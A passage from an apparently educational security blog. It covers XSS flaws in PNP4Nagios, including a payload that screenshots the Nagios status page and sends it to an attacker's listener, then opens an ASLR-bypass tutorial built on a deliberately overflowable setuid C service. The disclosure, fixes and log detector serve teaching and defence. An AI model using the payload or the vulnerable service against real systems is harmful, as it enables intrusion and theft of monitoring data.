had it all on one line but I have put it on separate lines here for readability (this will work as is; you will just need to join lines 3 and 4, which split a string literal)./p pThis JavaScript works for both of the XSS vulnerabilities we have found; just replace codealert(1)/code with a a href="http://www.w3schools.com/tags/ref_urlencode.asp" target="_blank"URL encoded/a version of the code above. a href="http://meyerweb.com/eric/tools/dencoder/" target="_blank"This/a site will encode it for you./p pI tried to make the payload reasonably small; you generally want to make an exploit payload as small as possible to raise as little suspicion as possible. I could probably have shrunk it more, especially as the site is using jQuery, but I'll leave that to someone else./p pLet's analyse this code a little and see what it is doing./p pFirstly it implements a function that iterates through every child node of the body and removes it. codechildNodes/code is a live list, so removing node codei/code shifts the remaining nodes down and the loop skips every other one; that is why coder()/code is called three times rather than once. Now we have a blank body to build on top of./p pNext it runs codewindow.stop();/code, which stops the main page from refreshing every 90 seconds./p pIt then creates an codeiframe/code which fills the page and has the codesrc/code attribute set to code/nagios/cgi-bin/status.cgi?host=all/code./p pThe codeonload/code event of the iframe is then hooked; inside this function it hands the HTML content of the iframe to html2canvas and hooks the codeonrendered/code callback. Reading the iframe's codecontentDocument/code only works because code/nagios/code and code/pnp4nagios/code are served from the same origin; the same-origin policy would block it for a cross-origin frame./p pOnce html2canvas has rendered the page it sends a GET request to codehttp://localhost:9000/?image=/code with the base64 encoded output of html2canvas appended (this could be a link to any server under the attacker's control)./p pLastly it creates a script tag with codehttp://html2canvas.hertzen.com/build/html2canvas.js/code (the html2canvas library) as the codesrc/code attribute and appends the script tag and the iframe to the body of the page./p pWhen run through a a href="http://jsbeautifier.org/" target="_blank"beautifier/a, the code looks like this:/p table class="highlighttable"trtd class="linenos"div 
class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nx"d/span span class="o"=/span span class="nb"document/spanspan class="p";/span/span span class="code-line"/span span class="code-line"span class="kd"function/span span class="nx"r/spanspan class="p"()/span span class="p"{/span/span span class="code-line" span 
class="nx"n/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"childNodes/spanspan class="p";/span/span span class="code-line" span class="k"for/span span class="p"(/spanspan class="nx"i/span span class="o"=/span span class="mf"0/spanspan class="p";/span span class="nx"i/span span class="o"lt;/span span class="nx"n/spanspan class="p"./spanspan class="nx"length/spanspan class="p";/span span class="nx"i/spanspan class="o"++/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"n/spanspan class="p"[/spanspan class="nx"i/spanspan class="p"]./spanspan class="nx"remove/spanspan class="p"();/span/span span class="code-line" span class="p"};/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="k"for/span span class="p"(/spanspan class="nx"i/span span class="o"=/span span class="mf"0/spanspan class="p";/span span class="nx"i/span span class="o"lt;/span span class="mf"3/spanspan class="p";/span span class="nx"i/spanspan class="o"++/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"r/spanspan class="p"();/span/span span class="code-line"span class="p"};/span/span span class="code-line"span class="nb"window/spanspan class="p"./spanspan class="nx"stop/spanspan class="p"();/span/span span class="code-line"span class="nx"f/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p");/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"src/span span class="o"=/span span class="s1"#39;/nagios/cgi-bin/status.cgi?host=all#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"style/span span class="o"=/span span class="s1"#39;border: 0; position:fixed; top:0; left:0; right:0;bottom:0; width:100%; 
height:100%#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"scrolling/span span class="o"=/span span class="s1"#39;no#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"id/span span class="o"=/span span class="s1"#39;e#39;/spanspan class="p";/span/span span class="code-line"span class="nx"f/spanspan class="p"./spanspan class="nx"onload/span span class="o"=/span span class="kd"function/span span class="p"()/span span class="p"{/span/span span class="code-line" span class="nx"html2canvas/spanspan class="p"(/spanspan class="nx"d/spanspan class="p"./spanspan class="nx"getElementsByTagName/spanspan class="p"(/spanspan class="s1"#39;iframe#39;/spanspan class="p")[/spanspan class="mf"0/spanspan class="p"]./spanspan class="nx"contentDocument/spanspan class="p"./spanspan class="nx"documentElement/spanspan class="p",/span span class="p"{/span/span span class="code-line" span class="nx"onrendered/spanspan class="o":/span span class="kd"function/span span class="p"(/spanspan class="nx"canvas/spanspan class="p")/span span class="p"{/span/span span class="code-line" span class="nx"q/span span class="o"=/span span class="ow"new/span span class="nx"XMLHttpRequest/spanspan class="p"();/span/span span class="code-line" span class="nx"q/spanspan class="p"./spanspan class="nx"open/spanspan class="p"(/spanspan class="s1"#39;GET#39;/spanspan class="p",/span span class="s1"#39;http://localhost:9000/?image=#39;/span span class="o"+/span span class="nx"canvas/spanspan class="p"./spanspan class="nx"toDataURL/spanspan class="p"(),/span span class="kc"true/spanspan class="p");/span/span span class="code-line" span class="nx"q/spanspan class="p"./spanspan class="nx"send/spanspan class="p"(/spanspan class="kc"null/spanspan class="p");/span/span span class="code-line" span class="p"}/span/span span class="code-line" span class="p"});/span/span span class="code-line"span 
class="p"};/span/span span class="code-line"span class="nx"s/span span class="o"=/span span class="nx"d/spanspan class="p"./spanspan class="nx"createElement/spanspan class="p"(/spanspan class="s1"#39;script#39;/spanspan class="p");/span/span span class="code-line"span class="nx"s/spanspan class="p"./spanspan class="nx"src/span span class="o"=/span span class="s1"#39;http://html2canvas.hertzen.com/build/html2canvas.js#39;/spanspan class="p";/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"s/spanspan class="p");/span/span span class="code-line"span class="nx"d/spanspan class="p"./spanspan class="nx"body/spanspan class="p"./spanspan class="nx"appendChild/spanspan class="p"(/spanspan class="nx"f/spanspan class="p");/span/span span class="code-line"/code/pre/div /td/tr/table pWe're nearly there. To automate the receiving of the image, I've written a python script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span 
span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"SocketServer/spanspan class="o",/span span class="nn"base64/span/span span class="code-line"/span span class="code-line"span class="k"class/span span class="nc"H2CHandler/spanspan class="p"(/spanspan class="n"SocketServer/spanspan class="o"./spanspan class="n"BaseRequestHandler/spanspan class="p"):/span/span span class="code-line" span class="k"def/span span class="nf"handle/spanspan class="p"(/spanspan class="bp"self/spanspan class="p"):/span/span span class="code-line" span class="n"fulldata/span span class="o"=/span span class="s1"#39;#39;/span/span span class="code-line" span class="n"data/span span class="o"=/span span class="s1"#39;dummy#39;/span/span span class="code-line" span class="k"while/span span class="nb"len/spanspan class="p"(/spanspan class="n"data/spanspan class="p"):/span/span span class="code-line" span class="n"data/span span class="o"=/span span class="bp"self/spanspan class="o"./spanspan class="n"request/spanspan class="o"./spanspan class="n"recv/spanspan class="p"(/spanspan class="mi"4096/spanspan class="p")/span/span span class="code-line" span class="n"fulldata/span span class="o"+=/span span class="n"data/span/span span class="code-line" span class="k"if/span span class="n"fulldata/spanspan class="o"./spanspan class="n"find/spanspan class="p"(/spanspan class="s1"#39;Host:#39;/spanspan class="p")/span 
span class="o"!=/span span class="o"-/spanspan class="mi"1/spanspan class="p":/span/span span class="code-line" span class="k"break/span/span span class="code-line" span class="nb"print/span span class="s1"#39;got image#39;/span/span span class="code-line" span class="n"img/span span class="o"=/span span class="n"fulldata/spanspan class="o"./spanspan class="n"split/spanspan class="p"(/spanspan class="s1"#39;base64,#39;/spanspan class="p")[/spanspan class="mi"1/spanspan class="p"]/spanspan class="o"./spanspan class="n"split/spanspan class="p"(/spanspan class="s1"#39; #39;/spanspan class="p")[/spanspan class="mi"0/spanspan class="p"]/span/span span class="code-line"/span span class="code-line" span class="n"fd/span span class="o"=/span span class="nb"open/spanspan class="p"(/spanspan class="s2"quot;/tmp/imgs/test.pngquot;/spanspan class="p",/span span class="s2"quot;wquot;/spanspan class="p")/span/span span class="code-line" span class="n"fd/spanspan class="o"./spanspan class="n"write/spanspan class="p"(/spanspan class="n"base64/spanspan class="o"./spanspan class="n"b64decode/spanspan class="p"(/spanspan class="n"img/spanspan class="p"))/span/span span class="code-line" span class="n"fd/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/span span class="code-line"span class="n"serverAddr/span span class="o"=/span span class="p"(/spanspan class="s2"quot;0.0.0.0quot;/spanspan class="p",/span span class="mi"9000/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="n"server/span span class="o"=/span span class="n"SocketServer/spanspan class="o"./spanspan class="n"TCPServer/spanspan class="p"(/spanspan class="n"serverAddr/spanspan class="p",/span span class="n"H2CHandler/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="n"server/spanspan class="o"./spanspan class="n"serve_forever/spanspan class="p"()/span/span span class="code-line"/code/pre/div 
/td/tr/table pThis script could be improved (it never sends an HTTP response, it overwrites the same file on every hit and it assumes every request carries an image), but it will serve our purpose right now./p pIf you run the payload while this server is running, an image like the following should be created in code/tmp/imgs/test.png/code:/p pimg src="/assets/images/web-hacking/pnp4nagios-html2canvas.png" width="750"/p h2Conclusion/h2 pNo user input should be trusted in any situation. All input should be validated, and output should be encoded for the context it lands in (an HTML attribute and a JavaScript function body need different treatment). In regards to websites, if HTML is not needed (as in this case), it should not be allowed./p pIn both of these cases, only numerical inputs should be allowed and everything else should be dropped./p pHappy Hacking :-)/p pstrongEDIT (2014-07-16):/strong/p pOn the day I posted this (2014-07-04) I informed the developers in case I had found new vulnerabilities that they didn't already know about and that weren't mentioned in the post to the OSS-Security mailing list./p pA bit of back and forth went on (I installed their latest version from GitHub) until it was clear that two of the three vulnerabilities I found were actually new:/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0;%7D;alert%281%29;function%20r%28%29%7Bamp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=Current_Loadamp;view=0amp;source=0%22%3E%3Cimg%20src=F%20/**/onerror=%22alert%281%29%22%3Eamp;end=1404503451amp;start=1404468087amp;graph_width=500amp;graph_height=100/code/p pThe second one here I dismissed in my post as probably the same as the previous one I had found, but in fact it wasn't; the first one I found in the post above was already fixed./p pSo the developers went away and fixed these two vulnerabilities on 2014-07-09, a href="https://github.com/lingej/pnp4nagios/commit/10000112eb87f23d136a121a8d49c6dcc3b1e82e" target="_blank"here/a are the commits./p pSo I had another look and about an hour later I found another:/p 
pcodehttp://dev/pnp4nagios/zoom?host=localhostamp;srv=_%22%3E%3Cimg%20src=B%20/**/onerror=%22alert%281%29%22%3E_amp;view=1amp;source=0amp;end=1404916359amp;start=1404826359/code/p pAgain I informed the developer and it was fixed on 2014-07-12, a href="https://github.com/lingej/pnp4nagios/commit/25de355097b3cf5d82ed3b63d68faadad7084e15" target="_blank"here/a are the commits./p
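pThe two contexts exploited above side by side: the hidden codeinput/code attribute that codeview/code lands in, with the code/**/onerror/code trick that slips past a handler-stripping filter, and the function body that codesource/code lands in on the zoom page, with the code;};alert(1);function r(){/code prefix and suffix that keeps the script syntactically valid. Next to each is the fix the conclusion calls for. This is an added example written for this page, not code from the post or from PNP4Nagios; the blacklist regex, the two templates and the exact markup of the hidden field are assumptions made for illustration./p

```javascript
// Added example, not code from the post or from PNP4Nagios: models the two
// injection contexts found in the post. The templates and the blacklist regex
// are assumptions for illustration; the real (PHP) view code is not reproduced.

// --- 1. HTML attribute context (the "view" parameter) -----------------------

// Assumed blacklist filter: strips whitespace-introduced event-handler
// attributes, which matches the behaviour the post observes for onerror.
function naiveAttrFilter(value) {
  return String(value).replace(/\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]*)/gi, '');
}

// Correct fix: encode for the attribute context. The value can then never
// terminate the quoted attribute or open a tag, whatever it contains.
function encodeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed shape of the hidden field the app emits for every query parameter.
function renderHiddenInput(name, value, sanitize) {
  return `<input type="hidden" name="${encodeHtmlAttr(name)}" value="${sanitize(value)}">`;
}

// Splits the rendered element at the closing quote of value="...". Whatever
// follows is ">" when the attribute is intact, or injected markup otherwise.
// The browser tokenizer treats a "/" between attributes as a stray
// self-closing marker and "**" as an attribute name, so "/**/onerror="
// is still an onerror attribute although no whitespace precedes it.
function analyseHiddenInput(html) {
  const m = /^<input type="hidden" name="[^"]*" value="[^"]*"(.*)$/s.exec(html);
  const tail = m ? m[1] : html;
  return { intact: tail === '>', liveHandler: /(\s|\/)on\w+\s*=/i.test(tail) };
}

// --- 2. JavaScript context (the "source" parameter on the zoom page) --------

// Assumed shape of the inline script: the value lands inside a function body.
function renderRedirectScript(source, sanitize) {
  return `function redirect(){var source=${sanitize(source)};}`;
}

// A blacklist has nothing useful to match on here. The fix is to validate the
// value against what it must be (a small non-negative integer) and reject
// everything else before it reaches the template.
function requireInteger(value) {
  if (!/^\d{1,6}$/.test(String(value))) {
    throw new Error('source must be a non-negative integer');
  }
  return String(Number(value));
}

// True when the script parses and redirect() is still its only function
// declaration, i.e. the value did not close the function early. Syntax check
// only; nothing is executed.
function scriptIsIntact(js) {
  try { new Function(js); } catch (e) { return false; }
  return (js.match(/function\s+[\w$]+\s*\(/g) || []).length === 1;
}

// Payloads from the post, URL-decoded.
const ATTR_PLAIN  = '"><img src=F onerror="alert(1)">';
const ATTR_BYPASS = '"><img src=F /**/onerror="alert(1)">';
const JS_PAYLOAD  = '0;};alert(1);function r(){';

function demo() {
  const rows = [
    ['naive filter, plain payload', analyseHiddenInput(renderHiddenInput('view', ATTR_PLAIN, naiveAttrFilter))],
    ['naive filter, /**/ payload ', analyseHiddenInput(renderHiddenInput('view', ATTR_BYPASS, naiveAttrFilter))],
    ['attribute encoding, /**/   ', analyseHiddenInput(renderHiddenInput('view', ATTR_BYPASS, encodeHtmlAttr))],
  ];
  for (const [label, result] of rows) console.log(label, result);
  console.log('raw source param, redirect() intact:', scriptIsIntact(renderRedirectScript(JS_PAYLOAD, String)));
  console.log('validated source, redirect() intact:', scriptIsIntact(renderRedirectScript('3', requireInteger)));
}

if (typeof require !== 'undefined' && require.main === module) demo();
```

pRun with codenode/code and the first two rows show what the post found: the whitespace-based filter strips the plain codeonerror/code but the attribute has already been broken out of, and the code/**//code variant keeps the handler alive. Attribute encoding needs no knowledge of tokenizer quirks because the value can no longer close the quote at all. In the script context the breakout payload parses cleanly, exactly as the post's prefix and suffix intend, which is why only type validation (an integer, nothing else) is a reliable fix there. codenew Function/code is used purely as a parser for the check; it is not something to put in production code./p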

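pSeen from the defender's side, the URLs in this post are easy to pick out of a web server's access log. The following is an added example for this page (not from the post or from PNP4Nagios) that scans Apache combined-format lines for the payload shapes shown above: HTML tags or event handlers inside any parameter, JavaScript statement breakouts, and non-numeric values in parameters that should only ever be numbers. The log lines are constructed for the example, and treating codestart/code, codeend/code, codegraph_width/code and codegraph_height/code as numeric-only, alongside codeview/code and codesource/code, is an assumption./p

```javascript
// Added example, not part of the post or of PNP4Nagios: flags requests that
// carry the payload shapes shown in the post in Apache combined-format access
// logs. The log lines below are constructed; the numeric-only parameter list
// is an assumption based on the post's conclusion.

const REQUEST_RE = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/;

// Parameters that should only ever be integers. view and source come from
// the post; the rest are numeric in every URL it shows (assumption).
const NUMERIC_PARAMS = new Set(['view', 'source', 'start', 'end', 'graph_width', 'graph_height']);

// Content rules applied to every decoded parameter value.
const CONTENT_RULES = [
  { name: 'tag-open',      re: /<\s*\/?[a-z]/i },                             // "><img src=F ...
  { name: 'event-handler', re: /(^|[\s\/'"])on[a-z]+\s*=/i },                 // /**/onerror=
  { name: 'js-breakout',   re: /;\s*}|function\s*[\w$]*\s*\(|alert\s*\(/i },  // ;};alert(1);function r(){
];

function decodeParam(raw) {
  try {
    return decodeURIComponent(raw.replace(/\+/g, ' '));
  } catch (e) {
    return raw; // malformed percent-encoding: inspect it as-is
  }
}

// Query string -> [{ name, value }]; repeated names are kept as separate entries.
function parseQuery(query) {
  if (!query) return [];
  return query.split('&').filter(Boolean).map((pair) => {
    const i = pair.indexOf('=');
    const name = i === -1 ? pair : pair.slice(0, i);
    const value = i === -1 ? '' : pair.slice(i + 1);
    return { name: decodeParam(name), value: decodeParam(value) };
  });
}

// One log line -> null when nothing is suspicious, else { path, findings }.
function analyseRequest(line) {
  const m = REQUEST_RE.exec(line);
  if (!m) return null;
  const q = m[1].indexOf('?');
  const path = q === -1 ? m[1] : m[1].slice(0, q);
  const query = q === -1 ? '' : m[1].slice(q + 1);
  if (!path.startsWith('/pnp4nagios/')) return null;

  const findings = [];
  for (const { name, value } of parseQuery(query)) {
    if (NUMERIC_PARAMS.has(name) && !/^\d+$/.test(value)) findings.push(`${name}: non-numeric`);
    for (const rule of CONTENT_RULES) {
      if (rule.re.test(value)) findings.push(`${name}: ${rule.name}`);
    }
  }
  return findings.length ? { path, findings } : null;
}

// Whole log -> [{ index, path, findings }] for the lines that were flagged.
function detect(lines) {
  const hits = [];
  lines.forEach((line, index) => {
    const result = analyseRequest(line);
    if (result) hits.push({ index, ...result });
  });
  return hits;
}

// Constructed log lines: the three URLs from the post plus one benign request.
const SAMPLE_LOG = [
  '10.0.0.5 - - [04/Jul/2014:17:10:21 +0100] "GET /pnp4nagios/graph?host=localhost&srv=_HOST_&view=3%22%3E%3Cimg%20src=F%20/**/onerror=%22alert%281%29%22%3E HTTP/1.1" 200 8342 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [04/Jul/2014:17:31:02 +0100] "GET /pnp4nagios/zoom?host=localhost&srv=Current_Load&view=0&source=0;};alert%281%29;function%20r%28%29{&end=1404503451&start=1404468087&graph_width=500&graph_height=100 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [04/Jul/2014:17:32:40 +0100] "GET /pnp4nagios/graph?host=localhost&srv=_HOST_&view=0 HTTP/1.1" 200 8102 "-" "Mozilla/5.0"',
  '10.0.0.5 - - [04/Jul/2014:17:40:11 +0100] "GET /pnp4nagios/zoom?host=localhost&srv=_%22%3E%3Cimg%20src=B%20/**/onerror=%22alert%281%29%22%3E_&view=1&source=0&end=1404916359&start=1404826359 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of detect(SAMPLE_LOG)) {
    console.log(`line ${hit.index} ${hit.path}: ${hit.findings.join(', ')}`);
  }
}
```

pThe content rules catch the exact shapes used in this post and are easy to vary around (different handler names, comments instead of codealert/code); the codenon-numeric/code rule on parameters that are only ever integers is the one that survives payload changes, which is the same observation the conclusion makes about the fix. Values are percent-decoded before matching, otherwise the encoded codeview/code payload would never contain a literal code</code./p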
Beating ASLR

7 July 2014 at 15:58
By: 0xe7
pHere we are going to start with the first protection I want to look at, which is a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization" target="_blank"address space layout randomization (ASLR)/a./p pIn parts a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"1/a, a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"2/a, a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a and a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a ASLR had been disabled./p pASLR randomizes the layout of the a href="https://en.wikipedia.org/wiki/Virtual_address_space" target="_blank"virtual address space/a of every userland process (the base addresses of the stack, the heap, shared libraries and, for position-independent executables, the program image itself) and, in more modern OSs, of kernel space too./p pBefore ASLR, the virtual address space of an application was completely static, meaning that everything would always be at the same memory address each time the application was run./p pIn parts 1, 2 and 3 we took advantage of this by being able to predict the address at which our a href="https://en.wikipedia.org/wiki/Shellcode" target="_blank"shellcode/a would end up./p pThis protection is slightly newer in the Linux kernel than a href="https://en.wikipedia.org/wiki/NX_bit" target="_blank"NX/a, as it was first merged in 2005 (kernel 2.6.12), but it will introduce us to an idea which we will use much more extensively to beat NX./p h2The App/h2 pThe application below is almost the same as the one in part a href="/x86-32-linux/2014/06/12/remote-exploitation/"3/a of this series:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 
```c
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <strings.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* close() */

#define PASS "topsecretpassword"
#define CNUM 58623
#define SFILE "secret.txt"
#define TFILE "token"
#define PORT 9999

void sendfile(int connfd, struct sockaddr_in cliaddr);
void senderror(int connfd, struct sockaddr_in cliaddr, char p[]);
void sendtoken(int connfd, struct sockaddr_in cliaddr);
int checkpass(char *p);


int main(void)
{
	int listenfd, connfd, n, c, r;
	struct sockaddr_in servaddr, cliaddr;
	socklen_t clilen;
	pid_t childpid;
	char pwd[1000];

	listenfd=socket(AF_INET,SOCK_STREAM,0);

	bzero(&servaddr,sizeof(servaddr));
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr=htonl(INADDR_ANY);
	servaddr.sin_port=htons(PORT);
	if ((r = bind(listenfd,(struct sockaddr *)&servaddr,sizeof(servaddr))) != 0) {
		printf("Error: Unable to bind to port %d\n", PORT);
		exit(1);
	}

	listen(listenfd,1024);

	for(;;) {
		clilen=sizeof(cliaddr);
		connfd = accept(listenfd,(struct sockaddr *)&cliaddr,&clilen);

		/* up to 1000 bytes of client-controlled data land in pwd */
		n = recvfrom(connfd, pwd, 1000, 0, (struct sockaddr *)&cliaddr, &clilen);
		pwd[n] = '\0';
		r = checkpass(pwd);
		if (r != 0)
			if (r != 5)
				senderror(connfd, cliaddr, pwd);
			else
				sendtoken(connfd, cliaddr);
		else
			sendfile(connfd, cliaddr);
		printf("Received the following:\n");
		printf("%s", pwd);

		close(connfd);
	}
}

void sendfile(int connfd, struct sockaddr_in cliaddr)
{
	FILE *f;
	int c;
	f = fopen(SFILE, "r");
	if (f) {
		while ((c = getc(f)) != EOF)
			sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
		fclose(f);
	} else {
		printf("Error opening file: " SFILE "\n");
		exit(1);
	}
}

void senderror(int connfd, struct sockaddr_in cliaddr, char p[])
{
	sendto(connfd, "Wrong password: ", 16 , 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
	sendto(connfd, p, strlen(p), 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
}

void sendtoken(int connfd, struct sockaddr_in cliaddr)
{
	FILE *f;
	int c;
	f = fopen(TFILE, "r");
	if (f) {
		while ((c = getc(f)) != EOF)
			sendto(connfd, &c, 1, 0, (struct sockaddr *)&cliaddr,sizeof(cliaddr));
		fclose(f);
	} else {
		printf("Error opening file: " TFILE "\n");
		exit(1);
	}
}

int checkpass(char *a)
{
	char p[512];
	int r, i;
	/* vulnerable: the copy length comes from the source (up to 1001 bytes),
	   not from the 512-byte destination */
	strncpy(p, a, strlen(a)+1);
	i = atoi(p);
	if (i == CNUM)
		r = 5;
	else
		r = strcmp(p, PASS);
	return r;
}
```

The main difference here is that the input is also converted to a number with atoi, and if that number is equal to 58623 the contents of a different file (token) are sent to the client instead of secret.txt. Anything else is compared against the password exactly as before.

The Fix

The fix is the same as in part 3. The vulnerable code is the call to strncpy in checkpass: its length argument is strlen(a)+1, which is derived from the attacker-controlled input rather than from the destination, so up to the 1000 bytes that main receives into pwd (plus the terminator) are copied into the 512-byte array p. Bounding the copy by the size of the destination, not the source, removes the overflow. Note that main has a related off-by-one of its own: when recvfrom fills all 1000 bytes, pwd[n] = '\0' writes one byte past the end of pwd.

Setting Up The Environment

The environment is going to be exactly the same as in part 3, except that there is a new file (token) and ASLR will be enabled.
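The following is an added example and not code from the tutorial: it places the bound of the original checkpass() next to a version that bounds the copy by the destination and fails closed on oversized input, and it works out how far the original write runs past p[]. The buffer sizes, the password and the number are taken from the listing above; the 'A'-filled inputs in probe_long_input() are constructed test data, and the function names are my own.

```c
/* Added example: the bound used by checkpass() in the listing, beside a
 * version that bounds the copy by the destination. Not the tutorial's code. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PASS   "topsecretpassword"
#define CNUM   58623
#define PBUF   512    /* size of p[] in the original checkpass()            */
#define PWDBUF 1000   /* size of pwd[] in main(), the most recvfrom() fills */

/* How many bytes the original strncpy(p, a, strlen(a)+1) writes past the end
 * of p[PBUF] for an input of input_len characters (0 when it fits). */
size_t overflow_bytes(size_t input_len)
{
	size_t copied = input_len + 1;          /* strncpy length argument */
	return copied > PBUF ? copied - PBUF : 0;
}

/* Bounded replacement for checkpass(). Same contract as the original:
 * 0 = password matched, 5 = number matched, anything else = wrong. */
int checkpass_fixed(const char *a)
{
	char p[PBUF];

	/* Fail closed: input that would not fit (terminator included) is just a
	 * wrong password; nothing is ever written past p. */
	if (strlen(a) >= sizeof(p))
		return 1;

	/* Bound by the destination and terminate explicitly: strncpy() does not
	 * add a NUL when the source fills the whole buffer. */
	strncpy(p, a, sizeof(p) - 1);
	p[sizeof(p) - 1] = '\0';

	if (atoi(p) == CNUM)
		return 5;
	return strcmp(p, PASS);
}

/* Constructed test input: n characters of 'A', run through checkpass_fixed().
 * Returns whatever checkpass_fixed() returned. */
int probe_long_input(size_t n)
{
	char *buf = malloc(n + 1);
	int r;
	if (!buf)
		return -1;
	memset(buf, 'A', n);
	buf[n] = '\0';
	r = checkpass_fixed(buf);
	free(buf);
	return r;
}

int main(void)
{
	printf("bytes written past p[] for a %d-byte pwd: %zu\n",
	       PWDBUF, overflow_bytes(PWDBUF));
	printf("correct password -> %d\n", checkpass_fixed(PASS));
	printf("correct number   -> %d\n", checkpass_fixed("58623"));
	printf("%d x 'A'       -> %d (rejected, no copy)\n",
	       PWDBUF, probe_long_input(PWDBUF));
	return 0;
}
```

With the original sizes, a full 1000-byte pwd overruns p by 489 bytes, which is far more than enough to reach checkpass's saved frame pointer and return address. The fixed version could drop the copy altogether and work on a directly; it is kept here so the change stays a one-line diff against the listing.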
```console
root@host:~# adduser appuser
Adding user `appuser' ...
Adding new group `appuser' (1002) ...
Adding new user `appuser' (1002) with group `appuser' ...
Creating home directory `/home/appuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
	Full Name []: 
	Room Number []: 
	Work Phone []: 
	Home Phone []: 
	Other []: 
Is the information correct? [Y/n]
root@host:~# ls
app-net.c
root@host:~# gcc -z execstack -fno-stack-protector -o app-net app-net.c
root@host:~# cp app-net /home/appuser/
root@host:~# cat /proc/sys/kernel/randomize_va_space
2
root@host:/home/appuser# ls -l
total 12
-rwxr-xr-x 1 root root 8431 Jul  7 22:01 app-net
root@host:/home/appuser# chmod u+s app-net 
root@host:/home/appuser# ls -l
total 12
-rwsr-xr-x 1 root root 8431 Jul  7 22:01 app-net
root@host:/home/appuser# echo 'This is a top secret file!
Only people with the password should be able to view this file!' > secret.txt
root@host:/home/appuser# ls -l secret.txt
